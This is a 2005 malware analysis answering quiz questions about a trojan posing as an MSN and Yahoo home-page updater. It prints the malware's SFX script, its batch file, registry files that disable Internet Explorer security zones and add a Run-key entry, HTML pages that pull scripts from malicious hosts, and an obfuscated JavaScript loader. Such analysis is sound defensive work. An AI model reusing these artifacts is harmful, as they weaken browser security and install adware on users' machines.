This malware analysis document discusses a piece of malware that disguises itself as an MSN and Yahoo updater. It unpacks itself using UPX and WinRAR, then modifies the registry and loads HTML files to redirect the user to malicious sites and install adware. The malware aims to circumvent security settings and install additional software onto the system.
1. Malware Analysis
Randy Armknecht – http://www.rarmknecht.com
October 2005
1. What is a .cmd extension? In which systems that this file extension would work?
It’s an executable extension for files that will be run by the cmd.exe interpreter on Windows NT and up
machines. CMD files do NOT start with the bytes 0x4D5A like Win32/PE .exe files do. Typically, and as
is the case with this malware, the .cmd file is an ASCII file that is run as a script by the interpreter.
2. Did you check the MD5 of the unzipped binary? Does it match?
I did and it matches as seen below:
C:MalwareGroundZeropbuenoquiz3>md5 BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d
E50E87AD5D34CF8D16D01447821D629D BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d
pbuenos e50e87ad5d34cf8d16d01447821d629d
mine E50E87AD5D34CF8D16D01447821D629D
3. Is it packed? If yes, which packed was used?
I ran the strings command below and believe that the output shows it to be packed with UPX and a
WinRAR Self Extracting Executable.
Strings v2.2
Copyright (C) 1999-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
ASKNEXT
VOL
RD1
xt
ASKNEXTVOL
GETPASSWORD1
LICENSEDLG
RENAMEDLG
REPLACEFILEDLG
STARTDLG
DVCLAL
ccpp
MZP
This program must be run under Win32
UPX0
UPX1
.rsrc
1.20
UPX!
SVW
…
name="Roshal.WinRAR.WinRAR"
2. 4. What is this piece of malware claiming to be?
By reading the SFX Comments section we can see that the malware is claiming to be an updater for MSN
and Yahoo. Inside is a .cmd file.
;The comment below contains SFX script commands
Path=.%systemroot%
SavePath
Setup=msnupdater.cmd
Silent=1
Overwrite=1
Title=Msn & Yahoo Updater
Text
{
Updater for Msn and Yahoo Home pages
}
License=Home Page Setup Updater
{
Msn and Yahoo Page updater
}
5. Please describe the process which this malware will try to get installed on the system.
From the SFX section it looks like the malware will copy msnupdater.cmd to %SYSTEMROOT%. The Silent
flag is set so it will not display any graphical notification to the user that it happened. Also, the
Overwrite flag is set, so if the file already exists it will be over written; possible way for the malware
to update older versions of itself? After the file has been copied it will be executed.
Thanks to FileMon we can see the cmd file being copied here:
After that file is created it creates yahoohomepage.html
Then it creates what looks to be a registry file 2377.reg
3. After 2377.reg it creates 5577.reg and msnhomepage.html
Now that all the files it needs to do its evil bidding are in place it uses cmd.exe to execute both
msnupdater.cmd and regedit.exe
Regedit then loads the two previously copied down .reg files and imports them
4. After that it opens Internet Explorer and loads msnhomepage.html
After closing that IE window it then relaunches IE and displays the yahoohomepage.html file
What it displays is shown below
After closing the Yahoo IE window the .cmd file finishes up and closes
5. 6. After some investigation on a machine that had this malware installed, was verified that the
machine was trying to access something related to "*msn*" and "*yahoo*"... Does this malware have
something to do with it? If so, with which purpose? :-)
I would say absolutely. Especially if the something it was trying to access were msnhomepage.html or
yahoohomepage.html. Let’s take a look at those files shall we?
msnhomepage.html
<html>
<title> Welcome to Msn.com </title>
<meta http-equiv="refresh" content="20;url=http://www.razor-radio.us">
<body>
Standby Loading Msn.com .......
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://static.windupdates.com/prompts/a372a171/a770ab73.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</body>
</html>
We can see that the only purpose of this page is to first load a JavaScript file from
static.winupdates.com. After 20 seconds it refreshes the page to display www.razor-radio.us
The machine that the malware executed on doesn’t have an internet connection, so I grab the
a770ab73.js file using curl on a *nix box. We’ll take a more detailed look at the javascript and website
later.
yahoohomepage.html
<html>
<title> Welcome to Yahoo.com </title>
<meta http-equiv="refresh" content="115;url=http://www.yahoo.com">
<body>
Standby Loading Yahoo.com ...........................................
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://static.windupdates.com/prompts/a376ab73/a776a174.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<!-- AUTO_PROMPT AD START -->
<script language='JavaScript' type='text/JavaScript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=0&delayloa
d=10&account_id=159080&recurrence=always&adid=a1111819823&event_type=onload&signature=
adult'></script>
<!-- AUTO_PROMPT AD END -->
</body>
</html>
We can see here that this grabs two javascript files, one from static.winupdates.com like the
msnhomepage.html file and another one from install.xxxtoolbar.com. These files were also grabbed
using curl on a *nix box. One improvement over the msnhomepage.html file is that after 115 seconds it
reloads the page with yahoo.com. Hey, at least this time it attempts to look legit :)
6. 7. In the same machine, was observed that some registry entries were messed up...Again, does this
malware have something to do with it? If so, why?
Absolutely, as mentioned in my response to question 5 two .reg files are copied into the %SYSTEMROOT%
directory and then imported with regedit. We can also verify this by looking at the source of
msnupdater.cmd seen below
@echo off
echo Updating Windows Shell Files
REGEDIT.EXE /S 2377.reg
REGEDIT.EXE /S 5577.reg
echo Updating Windows Shell Files.....
msnhomepage.html
echo Updating Windows Shell Files........
yahoohomepage.html
echo Updating Windows Shell Files...........
echo Updating Windows Shell Files..............
echo Updating Windows Shell Files is now Complete.
exit
Lets take a look at what these registry files do…
2377.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones0]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones1]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones2]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet
SettingsZoneMapProtocolDefaults]
"http"=dword:00000000
We can see that it modifies several of the Internet Zone settings in IE. Using
http://support.microsoft.com/?kbid=182569 we can see that this registry file does the following:
Value Setting
-----------------------------------------------------------------------
1001 Download signed ActiveX controls
1004 Download unsigned ActiveX controls
7. 1200 Run ActiveX controls and plug-ins
1201 Initialize and script ActiveX controls not marked as safe
1400 Active scripting
1406 Access data sources across domains
1606 Userdata persistence
1607 Navigate sub-frames across different domains
1A04 Don't prompt for client certificate selection when no
certificates or only one certificate exists *
The last entry in that file specifies that any website using http as it’s protocol should be treated as 0 or
local. Obviously, a very bad thing.
5577.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"SYSTRAY"="C:UNMT.EXE"
This entry sets the machine to run the program UNMT.EXE each time a user logs on with a description of
SYSTRAY. What I find odd is that this file does not exist. Maybe that file is downloaded by the
javascript which we’re just about to get to.
8. Please, describe how this malware tries to install softwares (and which ones) in the machine...
The initial install creates the two html files, two reg files, and the msnupdater.cmd file. The cmd file
runs by first updating the registry settings of IE and adds a program to run at user login. Next the
webpages are loaded. We’ve examined the cmd file and reg files previously, along with the base code
of the html files. Now we’ll take a look at the javascripts that the webpages run.
From the first webpage we saw that it executes a770ab73.js. The file looks like this:
/*T5gRxPmT LQ8N19 Yo Hs4K*/var _aT8;var _20S;var _xEN=document;var _hL4;var _hCK;var _fRO;var
_nMp=String;var _x5H;var _EzP;var _gQU;var _YJN;var _qR2;var _5xj=_nMp.prototype;var _dNK;var
_EoB;var _jHO;var _ehN;var _e6q;var _7w1;var _9o5;var _Z6h;var _zP2;var _pG0;var
_ODd;_5xj._hCK=_5xj.slice;/*V1ZBI3sc wSZFB7zhkjk HEo bS 5yiz8 _P0nRO Mcl5_9ea*/function _Z6h
(_XjQ){_xEN.write("Axhw".slice(5)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice
(3)+_rCz+_XjQ+".EC6zj".slice(7)+"ulswA".slice(3));}function _g8A(_XDG,_hCK){if(_hCK){return
this._hCK(_XDG,_hCK);}var _L1b;var _T0g;var _RDA='';for(_L1b=0; _L1b<this.length; _L1b++)
{_T0g=this.charCodeAt(_L1b)-_XDG;if(_T0g<32){_T0g=127-(32-_T0g);}_RDA+=_nMp.fromCharCode(_T0g);}
return _RDA;};
_5xj.slice=_g8A;_dNK="569ddbcd2297775:53b7cb36g1c9588c473d9bg:9fec43gefcd84:d8cb5498b7e63bb427dg8
287edgb61;444:77764:4947484374727444724:76494276434:7572767448414847774274".slice(1);
_fRO=1;_7w1="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4}un4nsxyfqq3}un".slice(5);
_YJN=0;_EoB=""m{".slice(8);_ODd="q}}yC88|}j}rl7!rwm~ymj}n|7lxv8y{xvy}|8|y;8|}ny|h ;7|!o".slice
(9);_e6q=3;var _821="iuuq;00qvcmjd/xjoevqebuft/dpn0mphhjoh3/qiq".slice(1);var _WAH="nzzv@55v
{hroi4}otj{vjgzky4ius5vuve{tjkx4vnv".slice(6);_x5H="Dmjdl!ZFT!up!dpoujovf".slice(1);
_ehN="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4of{f4gwnilj3ofw".slice(5);_9o5="tuzoikZk~zC_u
{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,xkzx SymC_u{1s{yz1lurru}
1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,yozkTgskCLxkk1Su|ok1Giikyyeeeee1Iroiq1_KY131Ol1 u
{1gmx444,yozkV{hroynkxCSkjog1Giikyy,znkskC}
nozk,grvngC6,rumuVgznC,rumuYo!kCrgxmk,iruykHztCzk~z".slice(6);_gQU="o{{wA66z{h{pj5~puk|wkh
{lz5jvt6jhi6TlkphHjjlzz6pl6iypknl4j@5jhi".slice(7);_zP2="rqordg".slice(3);
_jHO="Dmjdl!ZFT!up!dpoujovf".slice(1);_hL4=1;var
_rCz="jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1".slice(2);
_qR2=1;_20S=0;_pG0=0;_p_sf=_9o5;_p_ry=_e6q;_p_lu=_821;_p_xu=_7w1;_p_cl=_aT8;_p_cd=_20S;_p_sm=_ODd
;_p_ws=_Z6h;_p_pu=_EoB;_p_pr=_dNK;_p_cr=_hL4;_p_dl=_YJN;_p_ju=_ehN;_p_cm=_x5H;_p_ct=_fRO;_p_rm=_j
HO;_p_cp=_EzP;_p_pl=_WAH;_p_lf=_qR2;_p_cu=_gQU;_Z6h("joju/kt".slice(1));/*uy J 8s9-o
YlQRYYmYjWczG*/
Sure looks nasty, but I wrote a quick little html page that will output the results of the file to a
textarea on a webpage. From that we can see that all it really does is write the following to the
document object.
9. From the size of it, we can see that this is most likely what’s about to do the majority of the work. I
put it through my decryptor and … well what do you know, it stalls out when trying to grab the user
agent. Because the script never finishes I wasn’t able to make it decode itself. Could it be because the
box is fully patched up through October? Guess I’ll find out when other people post their answers.
9. If you could give only one advise to your users, based on what you observed on this malware,
what would you say?
Always be careful when going to websites. The javascripts are downloaded from windupdates.com, and
the malware tries to pretend to be Yahoo! and MSN even though it doesn’t do a good job of it. Modern
phishing emails are more convincing
10. Do you think that our affected user was lying to the IR Team?
I do not think the user was lying. One of the main websites that feeds this malware is
windupdates.com. An uninformed or simple user might think that it’s just short for Windows Updates
and not know that they should only update their computer by clicking Start->Programs->Windows
Update which should take them to http://windowsupdate.microsoft.com
11. Finally(!!), how would you classify this malware?
I’m not familiar with the various categories the malware could be categorized in. But I might consider it
a Trojan since it claims to do one thing but does another, and maybe as a downloader since it goes out
to the windupdates.com website to grab its JavaScript files. The remote files can be updated to provide
new improved functionality while the only infecting executable won’t need to be updated.